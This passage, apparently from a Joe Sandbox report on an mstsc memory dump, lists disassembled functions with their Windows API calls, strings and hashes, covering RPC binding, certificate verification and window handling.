                                                                                                                                                                                    • Opcode Fuzzy Hash: 069787be98385cc8febc9545d633e3c05a6ce45fb7bafa54c00c51c54c97f10f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7391CF71608304AFDB14DF21C889B6ABBEAFFC8314F14895DF9559B2A1DB70D881CB52
                                                                                                                                                                                    Function 0095C3D8 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 406COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0095C43C
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0095C485
                                                                                                                                                                                    • ProcessIdToSessionId.KERNEL32(00000000), ref: 0095C48C
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0095C496
                                                                                                                                                                                    • RpcBindingFree.RPCRT4(?), ref: 0095CA17
                                                                                                                                                                                      • Part of subcall function 0095F7B6: DeleteCriticalSection.KERNEL32(?,?), ref: 0095F7EA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$BindingCriticalCurrentDeleteErrorFreeLastSectionSessionmemset
                                                                                                                                                                                    • String ID: RpcShadow2 failed$SetTitle failed
                                                                                                                                                                                    • API String ID: 69563327-3302378902
                                                                                                                                                                                    • Opcode ID: 2042c5ab4f53328af3dd4ae3e9b6fd916e2d06352b6b3982f301e67e317bf55f
                                                                                                                                                                                    • Instruction ID: d0f17ecdb494037a2e74c4c0722bac5481396a0b10df442c6dcd9f24de42b7f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2042c5ab4f53328af3dd4ae3e9b6fd916e2d06352b6b3982f301e67e317bf55f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CE1E0F1A04355AFCB26CF16CC54FAA3BAABB49301F05409DEA04AB261D774DD88DF45
                                                                                                                                                                                    Function 00957135 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 202encryptionwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptVerifyDetachedMessageSignature.CRYPT32(?,00000000,?,?,00000001,?), ref: 009571F3
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00957203
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00957237
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 00957263
                                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000,0091396B,00000000,00000000,insufficient number of signature verification parameters), ref: 00957392
                                                                                                                                                                                    • CertFreeCertificateChain.CRYPT32(?,0091396B,00000000,00000000,insufficient number of signature verification parameters), ref: 0095739D
                                                                                                                                                                                    • CertCloseStore.CRYPT32(?,00000000), ref: 009573AE
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SetCertificate failed, xrefs: 00957313
                                                                                                                                                                                    • insufficient number of signature verification parameters, xrefs: 00957360
                                                                                                                                                                                    • VerifySignature failed, xrefs: 00957192
                                                                                                                                                                                    • ValidateCertificate failed, xrefs: 009572C3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CertErrorFreeLast$CertificateMessage$AddressChainCloseContextCryptDetachedHandleLibraryModuleProcSignatureStoreTraceVerify
                                                                                                                                                                                    • String ID: SetCertificate failed$ValidateCertificate failed$VerifySignature failed$insufficient number of signature verification parameters
                                                                                                                                                                                    • API String ID: 1801278590-3790569485
                                                                                                                                                                                    • Opcode ID: c4507d37b61c4a3e3457fb7f3d432abbd00df3adae5a8b73a9bf194b81a4c1b4
                                                                                                                                                                                    • Instruction ID: 75e6434e3f9380a95685214c750a7fd4ebe369900788e1e35e579e500f18f505
                                                                                                                                                                                    • Opcode Fuzzy Hash: c4507d37b61c4a3e3457fb7f3d432abbd00df3adae5a8b73a9bf194b81a4c1b4
                                                                                                                                                                                    • Instruction Fuzzy Hash: D361C53151C341AFD725CF96F849F66BBEAAB84321F044459FC84A71A2C770CE48EB52
                                                                                                                                                                                    Function 0095CA2C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 237memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000044), ref: 0095CA60
                                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000016,00000000,00000000,?), ref: 0095CABA
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0095CAC4
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0095CCC5
                                                                                                                                                                                    • RpcBindingFree.RPCRT4(00000000), ref: 0095CCD5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$Local$AddressAllocBindingCreateErrorHandleKnownLastLibraryMessageModuleProcTraceWell
                                                                                                                                                                                    • String ID: CShadowRpcUtils::s_Bind failed$CShadowRpcUtils::s_BindSecure failed$SessEnvPrivateRpc$ncalrpc
                                                                                                                                                                                    • API String ID: 105258157-1822820735
                                                                                                                                                                                    • Opcode ID: 05124cdd2f7a9c359764db67e3bac624ea19160cf5f3697a91aef048e846a3d2
                                                                                                                                                                                    • Instruction ID: 04d118926496a20373840d03bd373acc84c55dd94da76f392fefe84f885a2ca5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 05124cdd2f7a9c359764db67e3bac624ea19160cf5f3697a91aef048e846a3d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD8126B2904304AFDB25CF56C849F7A7AE9EB49312F11488DFD44AB2A1C674CC48EB95
                                                                                                                                                                                    Function 0092395D Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 168COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,00000000,0096A020), ref: 0092399C
                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00923A08
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleInitializeLibraryMessageModuleProcTraceVersion
                                                                                                                                                                                    • String ID: (null)$Failed DisplayContents on Help Pane$Failed to call CoInitialize$Failed to cocreate CLSID_HxHelpPane$mstsc.chm
                                                                                                                                                                                    • API String ID: 1070927090-1823579970
                                                                                                                                                                                    • Opcode ID: 5992b032369e490f73fa05b0e06235668d14642fa813297739bc71deb62d75e3
                                                                                                                                                                                    • Instruction ID: 7972893d96ea2fde0ba6a761a09aca8efae950dc3bddd5ae32351dcf2fad4452
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5992b032369e490f73fa05b0e06235668d14642fa813297739bc71deb62d75e3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E51E931A04328AFCB25CF24EC49FBA7BA9AB49310F048199F505A72A5C778CE80DF51
                                                                                                                                                                                    Function 00950BF5 Relevance: 16.7, APIs: 11, Instructions: 194windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00950C33
                                                                                                                                                                                    • IsWindow.USER32(?), ref: 00950C3E
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 00950C4D
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00950C62
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 00950C6A
                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00950C74
                                                                                                                                                                                    • PtInRect.USER32(00000000), ref: 00950C8C
                                                                                                                                                                                    • PtInRect.USER32(00000000,?,-00000001), ref: 00950C9A
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00950D03
                                                                                                                                                                                    • CopyRect.USER32(00000000,?), ref: 00950D4E
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,?,00000000,00000000,00000015), ref: 00950E12
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Rect$Window$System$Metrics$CopyIconicInfoParameters
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3517074850-0
                                                                                                                                                                                    • Opcode ID: 1ba1b55905026e8d618bf08c9155dc7f157bdac89f98866abe2ef865174eab8d
                                                                                                                                                                                    • Instruction ID: 3e809ee353de8c1d0d2095d611b7a95699903ebb190ce02f652b5f18102f8997
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ba1b55905026e8d618bf08c9155dc7f157bdac89f98866abe2ef865174eab8d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2761AD72A04309AFCB10DFA9DD85FEE7BB9EB88305F140418E900B7261CB31EC499B60
                                                                                                                                                                                    Function 009188BF Relevance: 15.3, APIs: 10, Instructions: 326windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 00918904
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 00918915
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091891F
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • IsZoomed.USER32(?), ref: 00918A26
                                                                                                                                                                                    • SetWindowPlacement.USER32 ref: 00918A6A
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00918A74
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000216), ref: 00918AE3
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000205), ref: 00918BC4
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00918C49
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00918C77
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ErrorLastPlacement$AddressClientFreeHandleIconicLibraryMessageModuleMoveProcRectTraceZoomed
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1784869082-0
                                                                                                                                                                                    • Opcode ID: 950fce831eec8531fb410be2ce1eb79bcafc933422fe5593ecfdd420d0b29d1b
                                                                                                                                                                                    • Instruction ID: a6e41228c269e551676fbbfb0c44118c8fa82a03bc7cd3fa484bacaa448158ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 950fce831eec8531fb410be2ce1eb79bcafc933422fe5593ecfdd420d0b29d1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0C16E71B04348AFDB25DFA0C889FAE7BAAAF44304F184059F905AB1A5CB75DC81EF50
                                                                                                                                                                                    Function 009420E2 Relevance: 13.8, APIs: 9, Instructions: 250COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PathFindFileNameW.SHLWAPI(00000003), ref: 0094210F
                                                                                                                                                                                    • PathAppendW.SHLWAPI(?,?), ref: 0094214C
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 009421A0
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    • FindClose.KERNEL32(00000002,0091396B,00000000,00000000), ref: 00942436
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindPath$AddressAppendAttributesCloseFreeHandleLibraryMessageModuleNameProcTrace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3301147593-0
                                                                                                                                                                                    • Opcode ID: 9ac6e8c41463407c275e5bb1e3fab5f03e9017bbd7ce1b0679a894b2bfa9a55c
                                                                                                                                                                                    • Instruction ID: 72011bab7137f4a159bebcdc63ecdd138e896b899ec43830df8e9a36519f9270
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ac6e8c41463407c275e5bb1e3fab5f03e9017bbd7ce1b0679a894b2bfa9a55c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D591E171A04208ABCB25DF60CC88FA677BAFF59314F940499F914A71B2D7B1DD90DB11
                                                                                                                                                                                    Function 009579B8 Relevance: 12.1, APIs: 8, Instructions: 96encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptMsgOpenToDecode.CRYPT32(00010001,00000004,00000000,00000000,00000000,00000000), ref: 009579CF
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00957284,?,?), ref: 009579F9
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00957284,?,?), ref: 00957A28
                                                                                                                                                                                    • CryptMsgUpdate.CRYPT32(00000000,?,?,00000001), ref: 00957A35
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00957284,?,?), ref: 00957A5D
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00957284,?,?), ref: 00957A8C
                                                                                                                                                                                    • CertOpenStore.CRYPT32(00000001,00010001,00000000,00000000,00000000), ref: 00957A96
                                                                                                                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 00957A9F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$Crypt$Open$CertCloseDecodeStoreUpdate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3172839031-0
                                                                                                                                                                                    • Opcode ID: 1a8a257950ac052f971a912f2fbeff9cd3249024a5b7e1bddacbbeea385b8690
                                                                                                                                                                                    • Instruction ID: f76589356b4fcd9edaeb6327a3dc607502f1264035d7e103658c45abe7651965
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a8a257950ac052f971a912f2fbeff9cd3249024a5b7e1bddacbbeea385b8690
                                                                                                                                                                                    • Instruction Fuzzy Hash: B221377122C3057FE7259BA6AC49F7B7E9DEB453A1F110049FD40D71A2CAA4CE44EB60
                                                                                                                                                                                    Function 0091A341 Relevance: 12.1, APIs: 8, Instructions: 82windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnableItemMenu$IconicZoomed
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1707219219-0
                                                                                                                                                                                    • Opcode ID: 8e9585f484e47fb1aa808c443445d9d4f1e4d328184eb4dd8c0675aec421adea
                                                                                                                                                                                    • Instruction ID: 9337203e069cdb58373eb1bd42f67094404164ba480f39fe7705ab7543ad6951
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9585f484e47fb1aa808c443445d9d4f1e4d328184eb4dd8c0675aec421adea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08218C71710209FFEB208F61DC49FAA7BA9FF84750F108169F5169A0A0CBB2AD41EB50
                                                                                                                                                                                    Function 00963AD1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,0096391A), ref: 00963B93
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,0096391A), ref: 00963C61
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$AddressCryptDataHandleLibraryLocalMessageModuleProcProtectTrace
                                                                                                                                                                                    • String ID: PBYTE$StringCbLength failed!
                                                                                                                                                                                    • API String ID: 4120179676-4256456346
                                                                                                                                                                                    • Opcode ID: 94082500bfdda174b7f6e56d697d100189e7ed63646600c55e8566c56366ab10
                                                                                                                                                                                    • Instruction ID: 42e3ae5c327170b81ae92b4e1ac0a75586e969b255780d0538efc7c48c60b1bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94082500bfdda174b7f6e56d697d100189e7ed63646600c55e8566c56366ab10
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77410371A08349AFDB248F98D849FBA7BA9EF09310F148059F944F72A1C778CA50DB84
                                                                                                                                                                                    Function 00943AE1 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 118libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(shell32.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00946433,?,00000001), ref: 00943B0D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID,?,?,?,?,?,?,?,?,?,00946433,?,00000001,?,00000000), ref: 00943B23
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00946433,?,00000001,?,00000000,00000000), ref: 00943BFB
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000A,0091396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00943B87), ref: 0091D673
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • shell32.dll, xrefs: 00943B03
                                                                                                                                                                                    • Microsoft.Windows.RemoteDesktop, xrefs: 00943AF9
                                                                                                                                                                                    • SetCurrentProcessExplicitAppUserModelID, xrefs: 00943B1D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                                                                                                    • String ID: Microsoft.Windows.RemoteDesktop$SetCurrentProcessExplicitAppUserModelID$shell32.dll
                                                                                                                                                                                    • API String ID: 2109255295-1123326357
                                                                                                                                                                                    • Opcode ID: f06d6ba57914c4327d702f3192a925726a1427f81676889ce778c3eb27c1ee77
                                                                                                                                                                                    • Instruction ID: fa71faac96b44f0cf84be4c3ac3dd8eb071520df7dafd13c14f81378663b8431
                                                                                                                                                                                    • Opcode Fuzzy Hash: f06d6ba57914c4327d702f3192a925726a1427f81676889ce778c3eb27c1ee77
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2410831A083446FD72DDFB4989AF653BA9EB49314F14404CF901EB1A2C6B1DE81EF55
                                                                                                                                                                                    Function 00960486 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RpcStringBindingComposeW.RPCRT4(484809d6-4239-471b-b5bc-61df8c23ac48,ncacn_np,00000006,00000006,Security=Impersonation Dynamic False,?), ref: 009604A5
                                                                                                                                                                                    • RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 00960505
                                                                                                                                                                                    • RpcStringFreeW.RPCRT4(00000000,?,00960651,00000006,\pipe\SessEnvPublicRpc,?,?,00000000,?,00000000,?,?,?,009605C2,?,?), ref: 00960573
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BindingString$ComposeFreeFrom
                                                                                                                                                                                    • String ID: 484809d6-4239-471b-b5bc-61df8c23ac48$Security=Impersonation Dynamic False$ncacn_np
                                                                                                                                                                                    • API String ID: 465755213-2085260422
                                                                                                                                                                                    • Opcode ID: d61ea2406f3a7ed1d38137c9c65a75720a4fbb9d0ced6dc1a29aab918eb06c86
                                                                                                                                                                                    • Instruction ID: f18285e9c61b075e8529bf2670a00d865cd97e304a3faa1f9f1ab95887a45fdd
                                                                                                                                                                                    • Opcode Fuzzy Hash: d61ea2406f3a7ed1d38137c9c65a75720a4fbb9d0ced6dc1a29aab918eb06c86
                                                                                                                                                                                    • Instruction Fuzzy Hash: F0310172A14304AFDB26CF5A9988F773AA9EBC4310F25045DF94697262D675CC00EF50
                                                                                                                                                                                    Function 00912890 Relevance: 9.1, APIs: 6, Instructions: 106libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,00000000,00000000,00003AB3), ref: 009128CF
                                                                                                                                                                                    • FindResourceExW.KERNEL32(00000000,?,?,00000000), ref: 009128EC
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00912999
                                                                                                                                                                                      • Part of subcall function 0091142A: GetLastError.KERNEL32(00910B13), ref: 0091142A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
